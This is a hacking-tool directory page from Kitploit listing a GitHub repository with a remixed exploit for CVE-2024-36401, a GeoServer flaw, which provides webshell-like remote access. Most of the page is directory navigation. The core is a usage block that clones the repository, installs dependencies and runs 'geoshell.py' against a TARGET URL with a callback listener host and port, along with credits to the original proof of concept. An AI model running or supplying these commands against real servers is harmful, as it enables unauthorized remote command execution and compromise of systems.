Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-36401 — Remix of Chokapikk's CVE-2024-36401 to allow webshell-like behaviour on limited environments | Kitploit
Tools/GitHubGitHub/keelanbrady1011/cve-2024-36401
Payload GenerationExploitationShellcodeWeb Application ExploitationRemote Access Tool
GitHubkeelanbrady1011/cve-2024-36401

CVE-2024-36401

Remix of Chokapikk's CVE-2024-36401 to allow webshell-like behaviour on limited environments

View Repository
1 month agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-36401

Remix of Chokapikk's CVE-2024-36401 to allow webshell-like behaviour on limited environments. Also allows for self-signed TLS sessions as HTTP sessions are a bit...

Usage:

root@kitploit:~
git clone https://github.com/keelanbrady1011/CVE-2024-36401 && cd CVE-2024-36401
pip install -r requirements.txt
python3 geoshell.py --lhost OWN_IP --lport PORT --url http://TARGET/ --ssl

Original POC:

https://github.com/Chocapikk/CVE-2024-36401

Credits

Original exploit code was created by: Chocapikk K3ysTr0K3R

Download Tool